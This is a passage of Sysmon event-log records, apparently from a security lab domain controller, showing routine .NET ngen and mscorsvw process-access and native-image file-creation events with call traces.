vc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.027","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010BAFD0A00}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7351,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.027\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010BAFD0A00}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.027","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010BAFD0A00}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7352,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.027\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010BAFD0A00}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.027","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010BAFD0A00}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7353,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.043\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010B3000B00}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.043","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010B3000B00}","TargetProcessId":"4580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7354,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.043\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010B3000B00}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.043","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010B3000B00}","TargetProcessId":"4580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7355,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.058\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010B3000B00}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.058","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010B3000B00}","TargetProcessId":"4580","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7356,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:52.183\r\nProcessGuid: {E2A3D6B1-1324-5F25-0000-0010B3000B00}\r\nProcessId: 4580\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11e4-0\\Microsoft.GroupPolicy.ServerAdminTools.GpmgmtLib.dll\r\nCreationUtcTime: 2020-08-01 07:00:52.183","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:52.183","ProcessGuid":"{E2A3D6B1-1324-5F25-0000-0010B3000B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11e4-0\\Microsoft.GroupPolicy.ServerAdminTools.GpmgmtLib.dll","CreationUtcTime":"2020-08-01 07:00:52.183","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7357,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.199\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010E4030B00}\r\nTargetProcessId: 5108\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.199","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010E4030B00}","TargetProcessId":"5108","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7358,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.199\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010E4030B00}\r\nTargetProcessId: 5108\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.199","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010E4030B00}","TargetProcessId":"5108","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7359,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.199\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010E4030B00}\r\nTargetProcessId: 5108\r\nTargetImage: 